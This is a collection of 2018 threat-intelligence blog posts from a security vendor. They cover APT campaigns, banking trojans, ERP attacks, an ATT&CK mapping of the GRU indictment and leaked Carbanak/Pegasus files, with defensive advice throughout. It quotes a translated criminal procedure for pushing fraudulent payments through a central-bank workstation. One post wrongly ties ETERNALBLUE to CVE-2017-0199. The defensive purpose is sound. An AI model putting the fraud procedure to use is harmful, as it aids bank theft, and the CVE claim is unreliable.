Richard Gold is an information security professional experienced in both offensive and defensive security, as well as security engineering. He has worked for Cisco on web proxies and Secure Development Lifecycles (SDLs), AGT International on Internet of Things/SCADA and, currently, Digital Shadows in various security-related roles. He is particularly interested in open source intelligence (OSINT) reconnaissance, Advanced Persistent Threat (APT) campaigns and offensive security techniques. He is a Certified SCADA Security Architect and holds a PhD in Computer Networking.



ShadowTalk Update – 07.30.2018 Mon, 30 Jul 2018 15:52:34 +0000 Richard Gold and Rose Bernard join Michael Marriott to talked about updates to the Satori botnet, which has expanded to incorporate new IoT devices using TCP port 5555. Amid news of a new wave of OilRig attacks, a Middle Eastern espionage campaign, we dive into PowerShell security risks and provide advice on best practices for those using PowerShell. For more information on PowerShell Security Best Practices, check out our blog Finally, we assess the Dragonfly campaign against U.S. power grids, and understand what it all means.



Dragonfly attributed to further attacks targeting energy sector in Europe and North America

The United States Department of Homeland Security has only recently released details of a 2017 campaign that targeted undisclosed United States energy companies. The campaign was orchestrated by suspected Russian nation-state threat group “Crouching Yeti” (aka Dragonfly). The group’s members allegedly conducted spearphishing and watering hole attacks to steal credentials from third-party suppliers, enabling access to United States utility networks. The details may have been released to strengthen the political credibility of United States intelligence services in the eyes of the public and the media; the release occurred during a period of conflict between the intelligence services and the presidential administration about the severity of the Russian cyber threat.


APT-28 parallels attacks on 2016 Presidential elections with attacks on US midterms

Microsoft reported that Russian nation-state linked threat group “APT-28” (aka Fancy Bear) has targeted the United States 2018 mid-term political elections through a phishing campaign against certain undisclosed candidates. The phishing emails were similar to those sent in previous APT-28 campaigns against the Democratic National Committee (DNC) in 2016 prior to the presidential election: both used fake Microsoft domains as command-and-control sites.


LabCorp hit by SamSam ransomware infection

LabCorp, one of the largest clinical laboratories in the United States, was subjected to a “SamSam” ransomware attack. Attackers reportedly accessed the laboratory’s network via brute-force cracking password attempts against remote desktop protocol ports exposed to the Internet. The attack infected approximately 7,000 systems and 1,900 servers, but remediation efforts were implemented quickly; no data was reportedly stolen or misused during the incident. SamSam has a lucrative history in use against healthcare entities, as well as government systems in the United States city of Atlanta and the state of Colorado’s Department of Transportation.


Attackers steal 1.5 million patient records from Singapore healthcare group

Singapore’s Ministry of Health released a statement detailing the theft of 1.5 million patient records from a healthcare group in that country. Attackers used privileged credentials to access a database, although the original infection vector remains unknown. Attacks on healthcare providers are increasing, as financially motivated threat actors seek information that is easily monetized on the dark Web; patient details can be re-sold and used for other fraudulent activities, or to tailor spearphishing campaigns.

Black Hat USA 2018 Thu, 26 Jul 2018 16:48:41 +0000 Black Hat USA 2018 is quickly approaching! The conference, one of the world’s leading Information Security events, focuses on the latest in research, development, and trends. In this blog, I’ll give a quick overview of what we’ll be up to at this year’s event.

Come Meet The Digital Shadows Team

At Black Hat USA 2018, our team will be available to walk you through how we help our clients quickly identify risks such as data loss, brand impersonation, cyber threats, credential exposure, and more across the open, deep, and dark web. We’ll also be sharing the results from the recent 2018 Forrester New Wave for Digital Risk Protection, in which we were named a “Leader”. Get your free copy of the report here to see the results prior.

If you’re interested in a quick chat with our team, book time with us here or visit us at Booth 1627 in the Business Hall. 

Black Hat Booth Digital Shadows

Learn About Our Research

This week, our research team produced a new report which outlined the threat landscape for ERP applications. Download your copy of the report here or stop by Booth 1627 in the Business Hall at Black Hat to chat with us on these findings and our other threat intelligence research.

ERP Applications Security

Party with us on Wednesday Night at Eyecandy Sound Lounge

On Wednesday night, we’re throwing a big party in the center of the casino floor at Mandalay Bay. Stop by our Security Leaders VIP Party at Eyecandy Sound Lounge from 8-10pm for food, music, and a full open bar. We do expect to hit capacity, so make sure to get on the list now!

Black Hat Party 2018

For all further information regarding Black Hat 2018, check out our dedicated event page here. Hope to see you in Las Vegas!

Cyber Threats to ERP Applications: Threat Landscape Tue, 24 Jul 2018 22:52:17 +0000 What are ERP Applications?

Organizations rely on Enterprise Resource Planning (ERP) applications to support business processes. This includes payroll, treasury, inventory management, manufacturing, financial planning, sales, logistics and billing. All of this can be an attractive target for threat actors. In our joint research report with Onapsis, ERP Applications Under Fire, we assess the threat landscape for two of the largest ERP applications: SAP and Oracle E-Business. The report outlines the scale of Internet-facing applications out there, the growing number of exploited vulnerabilities, and specific campaigns targeting these applications.

History of Attacks

It’s no surprise that actors target these ERP applications, particularly given the trove of sensitive data they provide access to, as well as the increasing number of public exploits available; through our research we observed a 100% increase of public exploits for SAP and Oracle ERP applications over the last three years. One of the most well-known instances occurred back in March 2014, when it was revealed that the breach of the United States Information Service (USIS) began through an exploited SAP vulnerability. The investigation found that Chinese actors exploited a zero-day vulnerability, resulting in the exposure of thousands of sensitive records on individuals’ security clearance applications. But how has the threat landscape developed aside from these campaigns? A variety of different actors, including hacktivists, cybercriminals and nation state-affiliated groups, have continued targeting SAP and Oracle ERP applications. In this blog, I’ll just focus on the cybercriminal element.

Banking Trojans Expand to Target Credentials of ERP Users

Banking trojans typically target banking customers with the aim of harvesting their online banking credentials. It’s common for the trojan to include configuration files that inform what URLs (normally bank logon urls) to redirect to. However, given the sensitive financial information that ERP platforms hold, trojans have also targeted the logon information of SAP platforms.

One of the most common banking trojan variants is Dridex, which has undergone multiple iterations since its emergence in 2014. In February 2017, one Dridex botnet updated its configuration to target SAP users. This was extended in February 2018 to include two more botnets that distributed the Dridex trojan. In this particular campaign, a malicious Microsoft Word document was delivered that downloaded Dridex on a victim’s machine. With “saplogon” in the configuration files, the malware would look for users running this software, and then harvest their credentials.

configuration file of Dridex examples

Figure 1: A Dridex 4 configuration file posted online in February 2018

Poor Password Hygiene Offers Opportunities for Cybercriminals

With criminal sites like UAS-Service and Xdedic, there’s long-standing market for hacked Remote Desktop Protocols (RDPs). Access to RDP servers offers cybercriminals a wealth of options, including installing keyloggers and ransomware. In this instance, the password exposed was a default SAP password – reminding us that criminals often gain access to these servers through weak or default passwords. SAP applications are no exception, especially when organizations use legacy platforms that were installed with weak default passwords.

In October 2017, users on a criminal forum shared details of a hacked Remote Desktop (RDP) from an SAP Hana application. The given password for the RDP was sap123, a default password, demonstrating the need for good password hygiene.

compromised remote desktop protocol criminal forum

Figure 2: Compromised Remote Desktop Protocol offered on criminal forum, including the use of a default SAP password


Cybercriminals are only one type of actor to have displayed a propensity to target ERP applications. Download the full report, ERP Applications Under Fire, to learn more about the exposure of ERP platforms, other types of adversaries targeting them, and ways to mitigate these threats.

To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

ShadowTalk Update – 07.23.2018 Mon, 23 Jul 2018 14:05:51 +0000 In this week’s ShadowTalk, we discuss the Robert Mueller indictment against 12 Russian individuals for alleged US election interference. However, rather than dwell on issues of attribution and geopolitics, we focus on the detailed tactics, techniques and procedures laid out in the indictment. Katie Nickels, a member of the MITRE team, joins Rafael Amado and Richard Gold us to discuss the ATT&CK™ framework in greater detail, as well as the key lessons that organizations can takeaway.


APT-28 shifts focus to Italian defense sector with new X-Agent variant

A new variant of the “X-Agent” backdoor malware was identified in a campaign targeting defense entities in Italy. The highlyprogrammable malware has been associated with APT-28 (aka Fancy Bear, Sofacy, Pawn Storm, Sednit), and was previously observed in attacks targeting the Democratic National Committee in 2016.

Banking trojans distributed via Google Play store

Malware distributors used downloaders hosted on the Google Play store to target Turkish-speaking Android users with variants of the Marcher and BankBot Anubis banking trojans. Placing downloaders on an app store rather than the malware is a tactic adopted by cyber criminals as downloaders are less likely to trigger the app store’s security measures, as they appear innocuous. This campaign was potentially part of a cybercrime-as-a-service offering, as significant resources were invested in to the fraudulent apps that masked the downloaders. Official download stores remain a prized target for malware distributors, as they offer a wider audience of potential victims, and abuses the trust users place in the legitimate download resource.


Theft at cryptocurrency exchange raises questions over regulations

An unknown threat actor has stolen approximately USD 13.5 million from Israeli cryptocurrency exchange, Bancor. Although no details about the attacker’s tactics have been released, some security researchers have alleged that the attackers exploited permissioned backdoors used by Bancor to freeze and control transactions. This has highlighted the lack of regulation of exchanges, something which is likely to continue to drive criminal attacks against the sector, which they perceive to be a low-risk high-reward target.


Sub-group of Lazarus Group observed conducting reconnaissance against South Korean government entities

Trend Micro identified reconnaissance activity which was likely a prelude to a watering hole attack targeting government entities in South Korea. The activity was attributed to a branch of the Lazarus Group, known as “Andariel Group”, and aligns with previous Lazarus Group activity. The attackers sought information on specific ActiveX objects, including two software programs known to be used by South Korean government institutions. The group were previously observed conducting similar reconnaissance in January 2017, following which, a targeted watering hole attack using a zero-day exploit was conducted in April 2017.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Five Threats to Financial Services: Banking Trojans Thu, 19 Jul 2018 16:42:51 +0000 A couple of weeks ago, we learned about a new phishing campaign that delivered Trickbot in an attempt to harvest the credentials of online banking customers. This latest wave targeted UK users, pretending to come from HRMC (HM Revenue & Customs). The actors exploited a vulnerability in Internet Explorer (CVE-2018-8174), for which a patch was released in May 2018. Banking trojans constitute a significant threat to banking customers and small businesses. In this blog – the second in a series on threats to financial services – we delve into the threat of banking trojans in more detail.

What is a Banking Trojan?

A banking trojan is a form of malware that seeks to collect the credentials of online banking customers from infected machines. The malware is delivered through a variety of mechanisms, exploits a range of vulnerabilities, and increasingly incorporates additional functionality.

One of the oldest variants is Zeus, a trojan first spotted in 2007 in a campaign targeting the US Department of Transportation, that has since grown in popularity. Zeus’ author reportedly retired in 2010 and the Zeus source code was leaked the following year, giving way to a swathe of alternative variants.

Trickbot is one of many banking trojans active in 2018, others include UrSnif, Dridex, Retefe and Panda. As shown below, these can be delivered in a variety of ways, including botnets (often through phishing campaigns) like Necurs and exploit kits (often drive-by downloads from a compromise website or malvertising) such as RIG. Once delivered – often through spam emails – many variants rely on users downloading malicious Microsoft Word Documents. Some variants, such as Retefe, have leveraged ETERNALBLUE (an exploit for CVE-2017-0199).


Variant Delivery Distribution Recent Targets Exploited Vulnerabilities
Ursnif Spam Emails Necurs Botnet; RIG exploit kit Japan; New Zealand; Australia; US; Canada; Italy CVE-2018-10730; CVE-2018-10731
Dridex Spam Emails; Malicious Microsoft Office documents Necurs Botnet; Compromised FTP servers UK, United States CVE-2017-0199
Retefe Spam Emails; Malicious Microsoft Office documents Unknown UK; Switzerland; Austria CVE-2017-0144
Trickbot Spam Emails; IcedID downloader Qtbot; RIG Exploit Kit Global CVE-2018-8174; CVE-2017-0144; CVE-2017-11882
Panda Zeus Spam Emails; Msg attachments Social media phishing; DeLoader malware dropper Japan; United States CVE-2014-1761; CVE-2012-0158


Table 1: Overview of most prominent banking trojans in 2018

 Protecting Yourself Against Banking Trojans

With malware developers rapidly adding new functionality to these variants, it can be challenging to keep up-to-date with the threat posed by banking trojans. However, by understanding the common ways in which the trojans are delivered and infect your machine, it can help you make more informed about security controls and patch priorities.

Organizations should look at deploying a defense-in-depth strategy to protect against initial infection and for post-infection. A strategy for defense should use a blend of technical and non-technical controls in order to be most effective. Some of the components that should be used include:

  1. Provide awareness and training for staff who may be the end users targeted by banking trojans. Staff should be made aware of the threat of banking trojans (and malware in general), how it is delivered, and information security principles and techniques.
  2. Open channels for staff to be able to report suspected phishing attempts. This should be a way for users to openly and easily report suspect emails and files, and receive validation prior to opening. This ensures that the user does not infect themselves or the organization, but can also provide security operations signatures to better protect others in the organization.
  3. Ensure operating systems, software and firmware on devices are kept patched and updated as vulnerabilities are discovered. A centralized patch management system may facilitate this process. Prioritizing recently exploited vulnerabilities, such as CVE-2018-8174, should be a focus.
  4. Use an email filtering system or service to identify phishing threats, particularly around malicious attachments. Office365 users should consider Microsoft’s Advanced Threat Protection (ATP), a cloud-based email filtering service. This will help prevent malware delivery through email phishing campaigns with malicious payloads or links.
  5. Ensure anti-virus (AV) software is installed on end-points and kept regularly updated with scans carried out regularly. Most AV solutions can be set to automatically update and scan.
  6. Manage the use of privileged accounts and ensure the “principal of least privilege” is implemented. Administrative access should be reserved only for those who require this. Those employees should only use the accounts when required and use regular user accounts for daily tasks. The principle of least privilege should also be implemented for file, directory, and network share permissions.
  7. Disable macros from Office files transmitted via e-mail. Consider using the Outlook preview pane to open Microsoft Office files transmitted via e-mail instead of full Office suite applications.
  8. Prevent access to malicious websites, including the downloading of the malware installed during these attacks. Blocking access to the Tor network and I2P sites may also be a useful technique in blocking the malware’s command and control (C&C) communications and can help prevent the initial malware drop.


For finance organizations, banking trojans targeting their employees and customers will be a concern. By taking these steps, organizations and individuals can better protect their sensitive logon information.


Stay tuned for our future blogs on other threats to financial services.


To stay up to date with the latest Digital Shadows threat intelligence and news, subscribe to our threat intelligence emails here.

Mitre ATT&CK™ and the Mueller GRU Indictment: Lessons for Organizations Tue, 17 Jul 2018 16:37:24 +0000 A recent indictment revealed how the GRU (Russia’s Military Intelligence agency) used both influence operations and network intrusions to achieve its policy aims. More precisely, the GRU weaponized the use of the network intrusions in its influence operations. The indictment goes into detail about the TTPs (Tactics, Techniques and Procedures) used by the attackers and it is worthwhile to pay careful attention to the adversary tradecraft that was used and how it can be defended against. For this blog we have used the MITRE ATT&CK™ framework as our methodology to play back the findings of the indictment. In doing so, we aim to provide key lessons organizations can take away from this indictment.

Not all organizations share the same threat model and so not all organizations are high-profile targets for nation-state cyber operations. However, the TTPs used are shared among many different classes of actors, including cybercriminals, and also provide a taste for what many actors will be using to perform intrusions in the future.

Stage #1: Reconnaissance

PRE-ATT&CK TTPs: All techniques

The GRU performed the following tasks:

  • Social media reconnaissance to identify targets for spearphishing emails
  • “[R]esearched the DCCC (Democratic Congressional Campaign Committee) and DNC (Democratic National Committee) computer networks to identify technical specifications and vulnerabilities”
  • “[R]an a technical query for the DCCC’s internet protocol configurations to identify connected devices”

DS Mitigation advice: Inform employees that their social media profiles may be of interest to adversaries. Provide advice on how to lock down profiles if requested. Ensure that network services are patched and running supported versions of software. Credentials, especially for admin accounts, should use strong passwords and two factor authentication (2FA) should be enabled wherever possible.


Stage #2 Initial Access

Four TTPs were used by the GRU to perform the initial compromise:

1.   ATT&CK TTP: Spearphishing attachment, Spearphishing link

Unsurprisingly spearphishing is still the go-to tactic of many threat actor groups as it has proven to be so successful in the past. The GRU uses spearphishing in a variety of ways.

  1. A target company was compromised and that company’s branding, and by assumption the address book, was used to target its customers. The branding reuse is an effective technique to provide legitimacy to a social engineering attack.
  2. A URL-shortener service was used in order to masquerade as a legitimate service and to redirect targets to credential harvesting sites. These credentials were then reused in later stages of the attack.
  3. The targeting of personal accounts.
  4. Fake document lures.

DS Mitigation advice: Use of an email filtering system or service can help to identify some spearphishing threats particularly around malicious attachments. Office365 users should consider Microsoft’s Advanced Threat Protection (ATP), a cloud-based email filtering service. 2FA is essential for email accounts, especially with a security key where possible. Employees should be made aware that personal accounts are regularly targeted by certain adversaries and to not enter credentials online unless they are expecting to do so.


2.   ATT&CK TTP: Trusted Relationship

Once the GRU had gained access to the DCCC network, it then proceeded to use that access to attack the DNC network. It used the keylogging and screenshot capabilities of their X-Agent malware in order to capture the credentials which it then proceeded to reuse.

DS Mitigation advice: 3rd parties, such as suppliers and partner organizations, typically have privileged access via a trusted relationship into certain environments. These relationships can be abused by attackers to subvert security controls and gain unauthorized access into target environments. Managing trusted relationships, like supply chains, is an incredibly complex topic. The NCSC (National Cyber Security Center) has an excellent overview of this challenging topic.


3.   ATT&CK TTP: Valid Accounts

The GRU used credentials stolen through a spearphishing attack to login to the DCCC network. Our assessment is that RDP (Remote Desktop Protocol) is an ideal targeting for reusing stolen credentials.

DS Mitigation advice: Access to RDP servers and other servers that provide remote access should be limited. IP whitelisting where appropriate is an effective control. Another method is to ensure that RDP is only accessible via a VPN that supports strong authentication.


4.   ATT&CK TTP: Drive-by Compromise

The GRU edited the target’s own website and “the Conspirators registered the domain actblues[.]com, which mimicked the domain of a political fundraising platform that included a DCCC donations page. Shortly thereafter, the Conspirators used stolen DCCC credentials to modify the DCCC website and redirect visitors to the actblues[.]com domain”.

DS Mitigation advice: Change management and file integrity monitoring (FIM) for websites and other external assets is an important part of ensuring that no unauthorized changes are made. For users, ensuring that browsers are patched to the latest version, vulnerable plugins are disabled and an adblocker is used, are important steps to staying safe while browsing.

Stage #3 Execution

ATT&CK TTP: User Execution

Once the GRU successfully compromised its targets, it deployed its malware implants to establish a foothold. The indictment describes this occurring after a successful spearphishing campaign. Most likely a variety of complementary techniques were used. The GRU used a custom, cross-platform toolkit called “X-Agent”, which was developed in-house for this purpose. X-Agent is a Remote Access Trojan (RAT) that has the ability to “to monitor individual employees’ computer activity, steal passwords, and maintain access to the DCCC network”.

One key finding is that the GRU relied on the Linux version of the toolkit, which remained undetected on the target’s network after the Incident Response effort had begun four months previously.

DS Mitigation advice: Up-to-date antivirus and other Endpoint Detection & Response (EDR) systems can provide protection against some malware variants. Protective monitoring can help detect unauthorized behavior both on the endpoint and on the network. Ensure that security teams have knowledge and understanding of all environments assists with rooting out adversaries which are capable of operating on different platforms.

Stage #4 Privilege Escalation

The indictment does not contain any directly obvious reference to privilege escalation. This fact in itself is interesting. For the GRU’s mission, that is, data theft, privilege escalation was not necessary in order to achieve its goals.

DS Mitigation advice: Patching operating systems and applications to prevent privilege escalation is important, as well as limiting who has access to admin accounts. It is worth keeping in mind that adversaries may not always need administrative access in order to achieve their goals. Privileged Identity Management (PIM) and Privileged Access Management solutions can provide added oversight to prevent accounts being misused and abused.

Stage #5 Persistence

ATT&CK TTP: Bootkit, Login Item, Modify Existing Service, Valid Accounts, Launch Agent, etc.

As mentioned previously, the GRU deployed implants for a variety of systems, which allowed it to persist in the target environment despite active Incident Response (IR) processes. The indictment does not go into detail as to how the GRU maintained persistence to survive reboots etc. during their standard operational procedure. However, open source reporting shows that the GRU also used a number of other persistence mechanisms, such as modifying logon scripts, modifying registry keys, and scheduled tasks.

DS Mitigation advice: Maintaining presence in a target environment typically requires the use of administrator privileges. Following the advice in Stage #4, as well as monitoring for the creation of new scheduled tasks, as an example, can limit the adversary’s options. The NCSC Windows 10 End User Device (EUD) guidance provides advice on how to securely configure Windows devices. The website has excellent advice on how to securely administer a Windows network.

Stage #6 Collection

ATT&CK TTP: Data from Local System/Network Shared Drive, Email Collection, Input Capture, Screen Capture, Data Staged, Data from Information Repositories

The GRU team’s mission was to steal data (in particular, research and planning documents) for later use in influence operations. In order to complete this mission, it performed the following actions:

  • Took keylogs and screenshots of targets including capturing the DCCC’s online banking information and passwords in use.
  • “[R]esearched PowerShell commands related to accessing and managing the Microsoft Exchange Server”. This activity was directly related to the theft of thousands of emails from the target organizations.
  • Gained access to the target’s analytics machines that were hosted by a cloud provider. “These computers contained test applications related to the DNC’s analytics. After conducting reconnaissance, the Conspirators gathered data by creating backups, or “snapshots,” of the DNC’s cloud-based systems using the cloud provider’s own technology. The Conspirators then moved the snapshots to cloud-based accounts they had registered with the same service, thereby stealing the data from the DNC”.

DS Mitigation advice: Large amounts of storage being used up unexpectedly is another signal that something potentially suspicious is occurring. Monitoring of key servers to ensure that only specific scripts, such as PowerShell scripts, are able to run and that the appropriate logging is in place to monitor PowerShell and other scripting activity is important. Audit logs for cloud services (e.g., Amazon Cloudtrail for AWS) need to be periodically reviewed to ensure that sensitive data is not subject to unauthorized access.

Stage #7 Exfiltration

ATT&CK TTP: Data Compressed, Data Encrypted, Exfiltration Over Other Network Medium

Once the GRU had collected its targeted data, it needed to move that data out of the target environments for analysis. The GRU then:

  • Compressed and exfiltrated the files that it gathered out of the target networks using the custom “X-Tunnel” tool to an external machine.

DS Mitigation advice: Blocking egress traffic that is not necessary for the organization’s requirements can assist with limiting an attacker’s options in terms of communicating outside of the organization. Web proxies can provide granular controls for restricting egress traffic types and destinations.


The GRU tradecraft presented in the indictment is not necessarily the most technically sophisticated in terms of 0day exploits and exotic command and control (C2) techniques. However, it points to an exceptionally determined adversary. It uses a variety of TTPs in order to compromise its targets and is constantly hunting for the weak points in its targets’ defenses.

Digital Shadows recommends a defense in depth approach to dealing with high-capability adversaries. That is, multiple, partially overlapping security controls that mutually reinforce each other in order to provide increased resiliency to network intrusions. While it may not be possible to keep out all types of adversaries, the more difficult they find it to compromise an organization, the fewer adversaries will be capable of successfully breaching the organization’s defenses.

To learn more, listen to our podcast episode on this topic below:

Digital Risk Protection: Avoid Blind Spots with a More Complete Risk Picture Tue, 17 Jul 2018 01:20:08 +0000 “Digital Shadows leads the pack for digital risk protection providers.” Digital Shadows’ customers have been telling us this for years, and now Forrester Research has included us among the vendors who “lead the pack” in the recently released report The Forrester New Wave™: Digital Risk Protection Q3 2018. The Forrester Research report also stated, “Customers extol Digital Shadows for its robust digital risk data and ability to deliver on an aggressive product road map, citing a new queryable deep and dark web search feature as evidence.”

This recognition as a “Leader” continues Digital Shadows’ leadership in digital risk management. We were also named a leader in The Forrester Wave™: Digital Risk Monitoring, Q3 2016.

digital risk protection

For me, this milestone and the previous recognition as a leader have been very satisfying. When I left Forrester Research, I wanted to help security leaders and security practitioners to better understand their external risks. Digital Shadows is doing this, and I’m proud to make our customers’ lives easier.

What is Digital Risk Protection?

Digital risk protection consists of monitoring and remediating external risk exposure online. Forrester describes DRP solutions as those that “offer rapid event detection and remediation capabilities so companies can fix issues before bad actors exploit them…. and to limit the effects of successful attacks when they occur.” In this blog, I take a look at the current state of digital risk protection and where I see its future.

The Current State of Digital Risk Protection

One of the topics I frequently discuss with my fellow CISOs is the urgent need to have the most comprehensive view of risks possible. We have such limited resources, and if we are going to effectively leverage our people and budget, we need a more complete risk picture. If you look back over the years, we have an affinity for risk blind spots:

  • Virtual servers. When VMware ESX started getting deployed, the security teams were hands-off as there weren’t any “mission critical workloads” running on them. How long did that last?
  • iPhone (mobile phones). We didn’t fully appreciate the amount of sensitive data that would be on the iPhones. Containerization and Mobile Device Management solutions emerged to address these risks.
  • iPad (tablets). Ever hear stories about radiologists using iPads with unencrypted personal health data on them? Yeah, me neither. #Sarcasm.
  • “We aren’t using the cloud?” Ever hear this? I hear it frequently. Meanwhile: Box, Dropbox, iCloud and others are running with little understanding of the risks. Cloud Access Security Brokers emerged to address these risks.

I place external digital risks and digital risk protection in this category. If we don’t have a better understanding of our digital footprints and what is happening beyond our boundary, we are once again putting our heads in the sand.

Forrester Research discusses these challenges: “Security and risk professionals face an intimidating task: protect vital, incredibly distributed digital footprints without direct control or ownership. It’s a major challenge just to understand an organization’s far-reaching digital ecosystem, let alone protect it.” – New Tech: Digital Risk Protection, Q2 2018In this new Digital Risk Protection Wave, Forrester adds “Security pros are turning to digital risk protection (DRP) solutions to deal with the heightened exposure their organizations’ digital infrastructure, assets, and accounts face online.”

I’m delighted with how Digital Shadows fared in this report, especially in terms of what we consider to be validation that our service, SearchLight, received from Forrester and our clients. You can download your own copy of the Forrester New Wave here, but here are my takeaways from the report and thoughts on Digital Shadows:

  • Digital Risk Protection Breadth and Depth in One Tool. We’ve always believed that Digital Risk Management needs to encompass a wide range of sources and should not be siloed to specific areas of online activity. Our coverage of criminal forums, dark web pages, Telegram, social media, search engines, code-sharing sites, paste sites (to name a few) helps us to excel in this area.
  • Strong Dark Web Visibility and Recon Capabilities. As organizations seek to better understand their exposure, we understandably get a lot of questions about the dark web. We’ve been monitoring dark web pages and criminal forums since before it was trendy. More recently, we’ve released Shadow Search; a new feature in our portal that allows our customers to query this information and set up their own alerts.
  • Leading Risk Remediation. It’s great to be able to detect risks online, but if a provider can’t help to remediate this, then you haven’t solved much. In every alert, our analyst team provides context and recommended actions, including the use of our templated and managed takedowns.
  • Industry-Leading Dashboard. We deliver our clients a quick and visual way of understanding their digital risks. Our main dashboard showcases the latest customer-specific alerts so that our clients can immediately identify their top priorities. Extra tabs for our intelligence database, incidents, reporting, and takedowns are also easily-navigable.
  • Rich Partner Ecosystem. Organizations shouldn’t be penalized for consuming our intelligence in ways that make the most sense for them. That’s why we’ve been building our a rich partner ecosystem over the past 2 years. This provides organizations with turnkey integrations into SIEMs, Threat Intelligence Platforms, Ticketing systems and automation platforms.
  • Global Reach and Analyst Expertise. Technology is important, but the true power comes when it is combined with analyst expertise. Our analysts help to remove false positives (freeing up time for you), add context, and respond to Requests for Information (RFIs).

If you want to read more on digital risk protection, download the full Forrester New Wave Report.

ShadowTalk Update – 07.16.2018 Mon, 16 Jul 2018 19:09:12 +0000 In this week’s ShadowTalk, Digital Shadows’ Russian-speaking security specialist discovered files and source code allegedly related to the Carbanak organized criminal group. The Carbanak malware is a backdoor used by the Anunak (Carbanak) Group to infiltrate financial institutions and steal funds. Richard Gold and Simon Hall join Rafael Amado to discuss the implications for financial services from these revelations. We ask whether this leak represents a threat to organizations, and how businesses can best defend themselves from the techniques used by sophisticated financial criminal groups such as Carbanak. Listen to the latest podcast or read our blog to find out more. 



Middle Eastern entities continue to attract cyber attacks

Two APT phishing campaigns have recently been targeting Middle Eastern institutions. Iranian APT group “Charming Kitten” has been linked to a phishing campaign that used a spoofed version of the website of Israeli cyber-security company ClearSky. Charming Kitten used the spoofed website to host login fields to harvest credentials, but the site was rendered offline within three hours of creation. Also during the past week, an APT spearphishing campaign targeted the Palestinian National Authority, along with other Middle Eastern entities. Malicious emails containing a decoy document were sent in conjunction with a malicious executable file. That campaign has not been attributed to a specific group, but there are several similarities to the work of cyber espionage group “Gaza Cybergang”. Given the political climate in the Middle East, comparable activity will likely occur for the medium- to long-term future (three months or at least a year).


Ransomware adopts cryptocurrency miner as alternative payload

A new variant of the Rakhni ransomware was reported on 05 Jul 2018 by cyber security company Kaspersky. Rakhni, first identified in 2013, uses emails containing weaponized documents to entice victims into inadvertently launching a malicious executable. However, the new variant also scans systems to determine the presence of a Bitcoin folder and confirm whether they have one or two logical processors. Depending on the victim’s machine, the malware would encrypt files and demand a ransom, install a cryptocurrency miner or deploy a worm to spread to additional devices. The incorporation of an alternative cryptocurrency payload into a traditionally ransomware-focused variant means that threat actors are still targeting cryptocurrencies, finding this method profitable and effective.


Alleged Carbanak Files and Source Code Leaked: Digital Shadows’ Initial Findings Wed, 11 Jul 2018 23:02:30 +0000 Digital Shadows’ Russian-speaking security team discovered a post from 6 July 2018 on exploit[.]in that provided files and source code that were allegedly related to the Carbanak group. On 11th July, these download links were added to Pastebin. We reviewed these files to understand the implications for financial services organizations. Here are our initial findings.

Confusion surrounding the source of the leaks

The Carbanak malware is a backdoor used by the Anunak (Carbanak) Group to infiltrate financial institutions and to exfiltrate funds from the target organization. Since September 2015, a new version of the malware was in circulation (dubbed Carbanak 2.0), and its use was not limited to the activity of the Anunak Group. For example, Carbanak 2.0 has been for sale for $6, 000 on criminal forums since 2016 (see Figure 1.)  In March 2018, law enforcement, who estimated the Carbanak made over $1 billion, claimed to have caught the mastermind of the Carbanak group.


Figure 1: Carbanak 2.0 offered for sale on Altenen[.]con on 23 July 2016


In this latest development, source code and files that purport to be from the group’s campaigns has been leaked, although there are significant doubts as to whether the malware is actually from Carbanak or another malware.

We also do not know enough about the actors behind the leak and the motivations behind leaking these files and source code. Another post on the same forum, from 10 July, purported to be an archive for Buhtrap (meaning “Accountant Trap”), which also contained code. While this was reportedly leaked several years back, it had not become public.

Malware source code is leaked for a variety of reasons, including by competitors or law enforcement. In the case of the Nuclear Bot banking trojan, this was leaked by the author to gain community trust.


Observations from the alleged Carbanak Leak

Regardless of the identity of the group behind these exposed files, or whether this is Carbanak, this data provides insight into how financial organizations are targeted by criminal groups. After analyzing these files and code, our key findings are:

1. Pegasus (the name of the leaked malware) leverages a range of features to get the job done. Pegasus is a toolset for generating fraudulent payment requests that contain a host of features, including: full-featured Remote Access Trojan (RAT) with credential harvesting, a modified version of Mimikatz, SMB named pipe communication, and a KBRI module for intercepting KBR (a Russian payment system) data exchanges.


Figure 2: A screenshot of a leaked text file

Translation: “”mod_KBRI

Module of substitution of payments in the CBD


Module-injector to intercept the process of CBD data exchange and receive from mod_KBRI the swapped data”

2. The group behind the malware have detailed knowledge of bank systems. The leaked files contained a detailed set of instructions into how bank’s fraud detection systems work. This included a 99-point checklist of fraud detection mechanisms and details on how transactions are blacklisted, for example, if the sender’s passport is registered as lost. Organizations should be mindful of information they are exposing on their anti-fraud solutions, which evidently provide a key resource for attackers.

3. The group shares detailed instructions into how to make fraudulent payments. The dump included instructions on how to use the toolset for making fraudulent payments. This includes details on the payment workflow regarding how payments are made and approved. Further details are provided on how payment files are moved through the payment system via the transport gateway. The instructions describe under which circumstances a payment is automatic or requires manual approval (the significance of this is provided in observation #5).


Figure 3: A screenshot of the text file containing detailed advice on making fraudulent payments

Translation: “In general, to send your payment through the Central Bank client automated workstation it is necessary:

      1) Find related to the exchange with the Central Bank client automated workstation for the key process uarm.exe and the gateway sending type Astra (AstraC.exe) or UTA (Program Files \ Bank of Russia \ UTA)

      2) In large banks, one or both components may be missing, and their role is to perform specialized software. Either the installation location may not be visible. In such cases, it is necessary to investigate the bank automation solutions (RS-Bank, Diasoft, etc.), file servers, to find out how the payment file is exchanged.

      3) From the Central Bank client automated workstation merge logs (uarm \ log \ folders with date) for the last 7-14 days. On the basis of logs find out the on-off time, the frequency of flights, the settings for file sharing. Depending on the settings, the Central Bank client automated workstation can perform file signing automatically when it appears in certain folders, or the operator (or some other person) may require some intervention to move the file to the desired folder.”


4. Full development cycle used to produce their malware. The campaign appears to produce custom malware kit for specific audiences. There is a large amount of code as part of Pegasus, but it’s clear that they are happy to integrate more tools, should it be appropriate for the job.

5. Key personnel of banks listed. Several spreadsheets were in the dump, including active directory backups and a separate list of over 1,000 individuals responsible in senior positions across a range of banks.


The threat to organizations

Despite the source code being available to the public, it’s unlikely that other cybercriminals will make use of the advice for targeting banks’ anti-fraud solutions given the complexity and specificity of the code base. As for the Mimikatz source code, there are indications that the code only affects older versions of Windows (Tweet from the author of Mimikatz:

While the source of the leaked files and source code is unknown, they do provide a good insight into the extent of information attackers collect on their targets, and how the groups bypass their controls.

